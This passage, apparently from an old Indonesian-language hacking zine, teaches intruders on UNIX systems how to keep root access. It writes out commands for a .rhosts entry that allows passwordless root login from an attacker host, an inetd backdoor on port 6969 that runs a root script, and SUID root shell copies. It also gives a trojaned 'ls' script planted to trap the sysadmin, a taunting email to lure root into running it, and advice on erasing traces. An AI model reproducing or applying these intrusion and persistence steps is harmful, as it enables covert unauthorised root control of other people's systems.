class="MsoNormal"&gt;maka dia bisa menjalankan eksploit-eksploit lokal untuk mendapatkan akses tak terbatas milik root.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Eksploit port 143 (IMAPd) malahan lebih gila lagi, dengan memberikan akses root tanpa password.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Apa trik dan tip yang kira-kira berguna untuk memanfaatkan eksploit-eksploit remote? Jelas sebuah&lt;/p&gt;  &lt;p class="MsoNormal"&gt;portscanner sangatlah bermanfaat untuk melihat port-port mana saja yang menerima koneksi.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Beberapa jenis 'scanner' lebih terfokus lagi, seperti cgi scanner dari kecoak (roachscan) yang&lt;/p&gt;  &lt;p class="MsoNormal"&gt;saat dijalankan akan memeriksa direktori cgi-bin dari sejumlah server sekaligus, mencari file password&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="" lang="FR"&gt;atau jalan masuk lainnya, melalui beberapa jenis eksploit umum.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="" lang="FR"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="" lang="FR"&gt;Satu program lain yang mungkin ada gunanya adalah 'netcat', bisa didapat dari http://www.l0pht.com&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="" lang="FR"&gt;Untuk menghemat waktu, banyak cracker yang menulis skrip otomasi, jalankan skrip, tinggal berikan&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;daftar target-target dan tinggalkan untuk sementara waktu. &lt;span style="" lang="FR"&gt;Kembali lagi sejam atau dua jam kemudian,&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;tinggal diperiksa server-server mana saja yang ada lobangnya, bisa dieksploit atau tidak, dll&lt;/p&gt;  &lt;p class="MsoNormal"&gt;(coba lihat artikel-artikel mengenai scanning/probing di situs-situs hacker).&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Terkadang ada juga eksploit yang tidak begitu jelas jenisnya, seperti eksploit lynx mailer, yang walaupun&lt;/p&gt;  &lt;p class="MsoNormal"&gt;kodenya sendiri terletak di host lain, namun untuk digunakan masih perlu campurtangan dari user lokal&lt;/p&gt;  &lt;p class="MsoNormal"&gt;untuk bisa bekerja (saat user meng-click sebuah link, sang eksploit akan mengirimkan file password ke&lt;/p&gt;  &lt;p class="MsoNormal"&gt;alamat email tertentu.)&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;2. Backdoor&lt;/p&gt;  &lt;p class="MsoNormal"&gt;===========&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Seperti terjemahan harfiahnya, backdoor bisa dianggap 'pintu masuk lewat belakang'. Backdoor berfungsi&lt;/p&gt;  &lt;p class="MsoNormal"&gt;untuk memberikan sang programmer akses ke suatu sistem, tanpa sepengetahuan user lain ataupun sang&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="" lang="FR"&gt;sysadmin. Tentu saja sang programer di sini bisa juga diartikan 'sang penyusup'. Seringkali backdoor&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="" lang="FR"&gt;memberikan akses tak terbatas kepada siapapun juga yang mengetahui jalan masuknya. &lt;/span&gt;Walaupun tidak&lt;/p&gt;  &lt;p class="MsoNormal"&gt;jarang vendor-vendor besar (baik hardware maupun software ) yang sengaja menempatkan backdoor tak&lt;/p&gt;  &lt;p class="MsoNormal"&gt;terdokumentasi untuk kemudahan 'maintenance' dan sejenisnya, dalam artikel ini yang dimaksud adalah&lt;/p&gt;  &lt;p class="MsoNormal"&gt;backdoor dalam artian memberikan akses root ke dalam sebuah sistem UNIX sebagai antisipasi jika sang&lt;/p&gt;  &lt;p class="MsoNormal"&gt;sysadmin kebetulan menyadari bahwa ada penyerang di dalam sistem.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Kamu sudah semalaman begadang, mencoba eksploit-eksploit remote, dan berhasil masuk ke sebuah sistem&lt;/p&gt;  &lt;p class="MsoNormal"&gt;dengan memanfaatkan login user dan segera menjalankan eksploit-eksploit lokal untuk mengambil alih&lt;/p&gt;  &lt;p class="MsoNormal"&gt;kekuasaan root. Tentunya sayang jika saat sang sysadmin kembali bekerja di keesokan harinya, akses kamu&lt;/p&gt;  &lt;p class="MsoNormal"&gt;ditutup. Nah, disinilah manfaatnya kita menanam satu atau lebih jalan masuk 'alternatif'. Jelas, sebagian&lt;/p&gt;  &lt;p class="MsoNormal"&gt;besar teknik-teknik backdooring hanya bisa diterapkan jika kamu mempunyai perizinan root.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Ingat, bahwa tujuan membuat backdoor bukanlah untuk mendapatkan akses root, tetapi untuk mendapatkan akses&lt;/p&gt;  &lt;p class="MsoNormal"&gt;root LAGI setelah sang sysadmin menutup segala jalan masuk normal. Terkadang sysadmin sering menganggap&lt;/p&gt;  &lt;p class="MsoNormal"&gt;selama file-file /etc/hosts.deny telah dikonfigurasi, maka segala koneksi dari host kamu akan ditolak.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Tentu saja kalian-kalian, sang cracker, kelihaian kung fu nya jauh di atas sang sysadmin, sebab tanpa&lt;/p&gt;  &lt;p class="MsoNormal"&gt;sepengetahuan beliau, telah kamu set up beberapa jalan masuk alternatif dengan privilese root.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Nah, backdoor backdoor ini ada yang memang sudah dari sononya (seperti Backdoor di router-router, printserver,&lt;/p&gt;  &lt;p class="MsoNormal"&gt;dll buatan 3Com), namun disini akan kami jelaskan cara membuat backdoor kamu sendiri di sebuah sistem UNIX.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Jalan termudah (dan yang paling gampang ditangkap) adalah dengan melalui file /.rhosts:&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;korban# echo "indohack2.ri.go.id ganjaman" &gt;&gt; /.rhosts&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;perintah diatas akan menambah satu entri di file .rhosts (sistem luar -dalam contoh diatas user ganjaman&lt;/p&gt;  &lt;p class="MsoNormal"&gt;dari indohack2.ri.go.id - yang boleh mengakses account tanpa password), dan untuk masuk kembali ke&lt;/p&gt;  &lt;p class="MsoNormal"&gt;sistem dari account "ganjaman" di indohack2.ri.go.id :&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;ganjaman@indohack2&gt; rlogin -l root korban.lameisp.net.id &lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;poof! shell root tanpa password!&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Untuk kalian yang ingin sedikit lebih tersembunyi lagi, coba perhatikan entri berikut dari file/etc/passwd sebuah sistem:&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;bin:*:3:7:Binaries Command and Source,,,:/bin:/bin/false&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;tentunya bagi mereka yang sering memanen password entri seperti di atas sudah tidak asing lagi.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Account diatas adalah account yang digunakan oleh UNIX sistem secara internal. Seringkali banyak diantara&lt;/p&gt;  &lt;p class="MsoNormal"&gt;crackers yang mengambil jalan singkat dan menghapus karakter *, mengakibatkan telnet dengan nama login&lt;/p&gt;  &lt;p class="MsoNormal"&gt;"bin" tidak memerlukan password. Tapi ingatlah bahwa file /etc/passwd biasanya adalah file pertama yang&lt;/p&gt;  &lt;p class="MsoNormal"&gt;akan diperiksa oleh sang sysadmin saat dia menyadari bahwa sistemnya telah kena susup. Agar kita lebih&lt;/p&gt;  &lt;p class="MsoNormal"&gt;sulit dideteksi, maka ada baiknya kita buat file .rhosts di home directory milik bin. Kembali ke entri&lt;/p&gt;  &lt;p class="MsoNormal"&gt;file password diatas, bisa kita lihat bahwa walaupun kita bisa me- rlogin -l bin korban.lameisp.net.id,&lt;/p&gt;  &lt;p class="MsoNormal"&gt;namun kita masih juga tidak bisa mendapatkan shell sebab account 'bin' dikonfigurasikan untuk menolak&lt;/p&gt;  &lt;p class="MsoNormal"&gt;penggunaan shell. Cara mengatasi masalah ini tentunya dengan membuat link dari /bin/false ke /bin/sh atau&lt;/p&gt;  &lt;p class="MsoNormal"&gt;/bin/tcsh. Apa daya seorang sysadmin? Tentunya jika mereka memang keren kung fu nya, sang sysadmin akan&lt;/p&gt;  &lt;p class="MsoNormal"&gt;mensetup sebuah skrip yang memeriksa keberadaan file-file .rhosts di dalam sebuah sistem. Tak lupa merubah&lt;/p&gt;  &lt;p class="MsoNormal"&gt;entri dari account-account internal dari /bin/false ke /nggak-ada-tuh atau string unik lainnya yang bukan&lt;/p&gt;  &lt;p class="MsoNormal"&gt;merupakan nama file.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Metode backdooring lain adalah dengan memanfaatkan "in.rootd" (sebenernya ini hanyalah rekayasa saja,&lt;/p&gt;  &lt;p class="MsoNormal"&gt;sebab sepanjang pengetahuan kami, nggak ada tuh yang namanya root daemon - tapi metode ini benar-benar&lt;/p&gt;  &lt;p class="MsoNormal"&gt;cocok disebut rootd) yang pada dasarnya bertugas untuk membuat sebuah lubang masuk lewat salah satu port yang&lt;/p&gt;  &lt;p class="MsoNormal"&gt;didefinisikan dalam "inetd":&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;root@korban# echo "ntcp 6969/tcp # Network Traffic Control Protocol" &gt;&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;/etc/services&lt;/p&gt;  &lt;p class="MsoNormal"&gt;root@korban# echo "ntcp stream tcp nowait root /bin/sh sh /tmp/crax0r" &gt;&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;/etc/inetd.conf&lt;/p&gt;  &lt;p class="MsoNormal"&gt;root@korban# echo "echo indohack2.ri.go.id &gt; ~root/.rhosts" &gt; /tmp/crax0r&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;menjalankan tiga perintah diatas bisa mengakibatkan kompromisasi sistem yang cukup dahsyat, namun tidak&lt;/p&gt;  &lt;p class="MsoNormal"&gt;akan segera tampak. Penjelasan dari ketiga perintah diatas:&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;1. mengaktifkan protokol ntcp di port 6969 (tentunya kamu memilih nomor port lain yang tidak begitu&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt;   &lt;/span&gt;mencurigakan, silakan pilih mulai dari 1024 sampai 65000-an), sedangkan "Network Traffic Control&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt;   &lt;/span&gt;Protocol" adalah karangan kamu sendiri sebab setiap service harus punya nama, dan biasanya sysadmin&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt;   &lt;/span&gt;tidak akan begitu curiga dengan nama seperti itu.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;2. memerintahkan sistem untuk menjalankan perintah /bin/sh sh /tmp/crax0r setiapkali sang sistem menerima&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt;   &lt;/span&gt;koneksi telnet lewat port 6969. Sayangnya mengeksekusi sebuah shell berprivilese root lewat cara ini&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt;   &lt;/span&gt;hanya akan mengakibatkan sang sistem bengong, sebab kita tidak bisa memberikan perintah-perintah selayaknya&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt;   &lt;/span&gt;kita login lewat jalur normal. Sang shell akan tetap dijalankan, namun tidak akan bisa mengeksekusi&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt;   &lt;/span&gt;perintah kita. Untuk itulah kita buat satu skrip di direktori /tmp/crax0r (tentunya kamu lebih pintar dan&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt;   &lt;/span&gt;memilih nama yang tidak begitu mencurigakan seperti /tmp/dev001).&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;3. Nah, perintah ketiga ini lah yang akan dieksekusi oleh sang shell yang baru saja kita luncurkan&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt;   &lt;/span&gt;(id=0 - root!). Tentunya kamu bisa saja menulis skrip yang lebih kompleks. Namun untuk menghemat tempat,&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt;   &lt;/span&gt;kita lancarkan saja perintah yang sudah dibahas diatas, yaitu menambahkan entri dari mesin host kita ke&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt;   &lt;/span&gt;file .rhosts milik root. Tentu jika sang admin memang keren kung funya, rlogind akan dikonfigurasikan&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt;   &lt;/span&gt;untuk tidak mengindahkan file .rhosts, namun jika kamu periksa isi direktori dan file "history" milik&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt;   &lt;/span&gt;root dan isinya menunjukkan bahwa sang sysadmin tidak begitu melek soal keamanan, maka metode diatas akan&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt;   &lt;/span&gt;memberikan jalan masuk lewat belakang ke dalam sistem target (idih, kesannya kayak cerita-cerita porno&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt;   &lt;/span&gt;anal seks aja!). Sekarang kamu tinggal:&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;ganjaman@indohack2&gt; telnet korban.lameisp.net.id 6969&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;nah, sistem kamu akan tersambung ke sistem target lewat port 6969, sedangkan daemon inet di mesin korban&lt;/p&gt;  &lt;p class="MsoNormal"&gt;akan menerima sambungan tersebut, menjalankan perintah dalam skrip /tmp/crax0r dengan privilese root, dan&lt;/p&gt;  &lt;p class="MsoNormal"&gt;dengan segera menutup kembali sambungan telnet. Sekarang .rhosts milik root sudah ditambahi satu entri&lt;/p&gt;  &lt;p class="MsoNormal"&gt;lagi, yaitu nama host kamu. Untuk kembali menggarap sistem target (sebaiknya dilakukan saat itu juga,&lt;/p&gt;  &lt;p class="MsoNormal"&gt;sebab sang sysadmin mungkin akan curiga melihat skrip 'asing' dijalankan lewat port 6969) kamu tinggal:&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;ganjaman@indohack2&gt; rlogin -l root korban.lameisp.net.id&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;dan, BOOM!&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;korban# &lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;shell root tanpa password! (Nah, sekarang kamu boleh kirim &lt;st1:city st="on"&gt;&lt;st1:place st="on"&gt;surat&lt;/st1:place&gt;&lt;/st1:City&gt; penggemar ke indohack@hotmail.com,&lt;/p&gt;  &lt;p class="MsoNormal"&gt;bertitel "Terimakasih, suhu Ganjaman dan SuperCock, atas ilmu ngent engin badannya " :) ).&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Tapi ingatlah untuk segera menghapus file .rhosts dan jejak jejak lain. Tentunya kalau kung fu kamu&lt;/p&gt;  &lt;p class="MsoNormal"&gt;emang udah cukup tinggi, teknik menyembunyikan diri dan antideteksi udah bukan barang asing bagi kamu,&lt;/p&gt;  &lt;p class="MsoNormal"&gt;jadi, jangan lupa aktifkan segala spoofer program, dll. Kalau kamu benar-benar suka mengutak-utik,&lt;/p&gt;  &lt;p class="MsoNormal"&gt;serangan bisa dibuat dengan lebih tersembunyi lagi, seperti dengan memanfaatkan service-service yang&lt;/p&gt;  &lt;p class="MsoNormal"&gt;jarang (hampir tidak pernah dipakai) seperti utilitas-utilitas X, segala utilitas berkepala "r",&lt;/p&gt;  &lt;p class="MsoNormal"&gt;dan banyak lagi.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Metode lain yang cukup populer adalah dengan membuat sebuah file dengan bit SUID tambahan, namun cara&lt;/p&gt;  &lt;p class="MsoNormal"&gt;ini gampang terdeteksi jika kebetulan sistem mempunyai program audit keamanan yang akan mensensus&lt;/p&gt;  &lt;p class="MsoNormal"&gt;seluruh file berbit SUID yang terletak diluar lokasi-lokasi wajar (seperti /tmp atau lokasi homedir&lt;/p&gt;  &lt;p class="MsoNormal"&gt;user). Ide yang lebih mantap lagi adalah dengan memodifikasi suatu program yang sudah berjalan / terinstal&lt;/p&gt;  &lt;p class="MsoNormal"&gt;secara default, seperti xterm dan splitvt, sehingga sebuah option rootshell akan secara otomatis&lt;/p&gt;  &lt;p class="MsoNormal"&gt;execv("/bin/sh", "sh", NULL);.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Kalau kamu emang pendekar asli (dan entah kenapa sedang membaca artikel kelas kacangan ini), kamu&lt;/p&gt;  &lt;p class="MsoNormal"&gt;bisa modifikasi daemon-daemon yang sedang berjalan untuk menerima perintah-perintah hasil karangan&lt;/p&gt;  &lt;p class="MsoNormal"&gt;kamu sendiri. Berikut adalah cuplikan dari metode milik Hacker nagageni 212 yang telah berhasil&lt;/p&gt;  &lt;p class="MsoNormal"&gt;memodifikasi program sendmail di server korban.com (PSM=Pukulan Sinar Matahari):&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;212@GG&gt; telnet korban.com 25&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Trying mesin.korban.com&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Connected to mesin.korban.com.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Escape character is '^]'.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;220 mesin.korban.com ESMTP Sendmail 8.8.5/8.8.5; [snip]&lt;/p&gt;  &lt;p class="MsoNormal"&gt;PSM_EXEC /bin/cp /bin/sh /tmp/elit&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Done master!&lt;/p&gt;  &lt;p class="MsoNormal"&gt;PSM_EXEC /bin/chmod 4755 /tmp/elit&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Done master!&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Jika menurut kamu cuplikan diatas sudah cukup familiar, maka kami dengan segala kerendahan hati&lt;/p&gt;  &lt;p class="MsoNormal"&gt;minta izin untuk berguru!&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;3 Trojan Horse&lt;/p&gt;  &lt;p class="MsoNormal"&gt;===============&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Tidak akan banyak penjelasan mengenai metode ini, sebab pada umumnya Trojan Horse hanya efektif&lt;/p&gt;  &lt;p class="MsoNormal"&gt;jika kamu betul-betul pintar menutupi suatu program atau jika sang sysadmin memang betul-betul tolol.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Pada prinsipnya, Trojan Horse adalah program yang mempunyai 'feature' gelap. Misalnya kamu membuat&lt;/p&gt;  &lt;p class="MsoNormal"&gt;sebuah game yang cukup heboh dan kamu dengan sengaja menyelipkan perintah untuk membuka akses di dalam&lt;/p&gt;  &lt;p class="MsoNormal"&gt;kode game kamu, sedemikian rupa sehingga saat sang sysadmin menjalankan program tersebut, tanpa&lt;/p&gt;  &lt;p class="MsoNormal"&gt;disadarinya file .rhosts nya telah ketambahan sesuatu. Kami kenal seorang hacker yang lihai menulis&lt;/p&gt;  &lt;p class="MsoNormal"&gt;skrip IRC, dan skrip IRC-nya kebetulan mempunyai banyak peminat. Beberapa 'lamers' mendownload skrip&lt;/p&gt;  &lt;p class="MsoNormal"&gt;tersebut tanpa menyadari bahwa sang skrip menyelipkan beberapa perintah untuk mengizinkan&lt;/p&gt;  &lt;p class="MsoNormal"&gt;akses tak berpassword kepada sang penulis asli skrip. (Hello, Tut!)&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;4 Trapdoor&lt;/p&gt;  &lt;p class="MsoNormal"&gt;===========&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Banyak persamaan antara Trapdoor dengan Backdoor dan Trojan Horse, namun dalam artikel ini, 'Trapdoor'&lt;/p&gt;  &lt;p class="MsoNormal"&gt;diasumsikan sebagai cara yang bisa kita gunakan untuk menjebak (trap) sang sysadmin untuk memberikan&lt;/p&gt;  &lt;p class="MsoNormal"&gt;kita akses root kedalam sistem. Seringkali kita terbentur masalah sistem operasi yang paling gres,&lt;/p&gt;  &lt;p class="MsoNormal"&gt;atau sebuah sistem dimana hampir semua eksploit untuk mendapatkan root tidak berjalan sama sekali&lt;/p&gt;  &lt;p class="MsoNormal"&gt;(patched systems). Jangan putus asa! Masih banyak metode yang bisa kita terapkan untuk membuat sang&lt;/p&gt;  &lt;p class="MsoNormal"&gt;sysadmin tertipu, berakibat dibukanya akses ke dalam sistem. Misalkan kamu sudah berhari-hari mengoprek&lt;/p&gt;  &lt;p class="MsoNormal"&gt;sebuah target dengan menggunakan account dan password seorang user biasa hasil colongan lewat phf,&lt;/p&gt;  &lt;p class="MsoNormal"&gt;dan sayangnya tidak ada exploit yang mempan. Nah, sudah saatnya kita terapkan metode Trapdoor.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Berikut adalah metode Trapdoor yang walaupun sederhana, masih saja bisa mengelabui puluhan sysadmin&lt;/p&gt;  &lt;p class="MsoNormal"&gt;diluar &lt;st1:city st="on"&gt;&lt;st1:place st="on"&gt;sana&lt;/st1:place&gt;&lt;/st1:City&gt;.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Pertama-tama, kamu perlu merubah perizinan homedir kamu (atau homedir milik user yang accountnya&lt;/p&gt;  &lt;p class="MsoNormal"&gt;kamu 'pinjam'):&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;user1@korban&gt; chmod 700 ~/.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Nah, karena sekarang homedir kamu bermode 700, sang syadmin perlu mengganti privilesenya ke root jika&lt;/p&gt;  &lt;p class="MsoNormal"&gt;beliau ingin memeriksa isi direktori ybs. Nah, langkah berikutnya adalah membuat sebuah skrip yang&lt;/p&gt;  &lt;p class="MsoNormal"&gt;bertugas untuk bertingkahlaku selayaknya perintah biasa, namun diluar pengetahuan sang admin,&lt;/p&gt;  &lt;p class="MsoNormal"&gt;justru membuka satu (atau beberapa) kelemahan dalam sistem. Yang langsung terpikir olehmu, jelas,&lt;/p&gt;  &lt;p class="MsoNormal"&gt;perintah ls. Disinilah letak kelemahan UNIX dibanding uh, MS-DOS. Dalam UNIX, seorang sysadmin yang&lt;/p&gt;  &lt;p class="MsoNormal"&gt;baik selalu mengetik 'full pathname' dari program manapun yang dia jalankan (seperti /bin/ls atau&lt;/p&gt;  &lt;p class="MsoNormal"&gt;/usr/sbin/vi index.html), dan untuk tujuan kemudahan, biasanya /bin atau /usr/sbin sudah dimasukkan&lt;/p&gt;  &lt;p class="MsoNormal"&gt;dalam daftar search path. Jadi jika misalnya sang sysadmin melakukan:&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;root# pwd&lt;/p&gt;  &lt;p class="MsoNormal"&gt;/usr/home/staff/user1&lt;/p&gt;  &lt;p class="MsoNormal"&gt;root# ls&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;maka yang dijalankan adalah program /bin/ls. Apa akibatnya jika kebetulan dalam direktori&lt;/p&gt;  &lt;p class="MsoNormal"&gt;/usr/home/staff/user1 kita letakkan sebuah skrip bernama 'ls'? Heheheh cukup menarik, khan. Nah, sekarang&lt;/p&gt;  &lt;p class="MsoNormal"&gt;kita bisa buat sebuah skrip yang berisi:&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;#!/bin/sh&lt;/p&gt;  &lt;p class="MsoNormal"&gt;cp /bin/sh /tmp/vi-save-902887&lt;/p&gt;  &lt;p class="MsoNormal"&gt;chown root /tmp/vi-save-902887&lt;/p&gt;  &lt;p class="MsoNormal"&gt;chmod 4755 /tmp/vi-save-902887&lt;/p&gt;  &lt;p class="MsoNormal"&gt;rm ./ls&lt;/p&gt;  &lt;p class="MsoNormal"&gt;ls&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;simpan skrip tersebut di homedir user1, beri nama "ls" dan&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;user1@korban&gt; chmod +x ls&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;sekarang tinggal pintar-pintarnya kamu mengakali sang sysadmin untuk mengecek isi homedir user1.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Jika kamu kebetulan punya login/passwd untuk user2 di mesin yang sama, maka kamu bisa saja 'mengundang'&lt;/p&gt;  &lt;p class="MsoNormal"&gt;sang admin. Login sebagai user1, dan kirim imel&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;user1@korban&gt; mail root@localhost&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Subject: "Heheheh Kena garap dari belakang!"&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Hello sysadmin tolol! Mesin kamu sudah kebobolan!&lt;/p&gt;  &lt;p class="MsoNormal"&gt;ttd,&lt;/p&gt;  &lt;p class="MsoNormal"&gt;God of All Hackers, Virus Researchers and Lame Mailbombers,&lt;/p&gt;  &lt;p 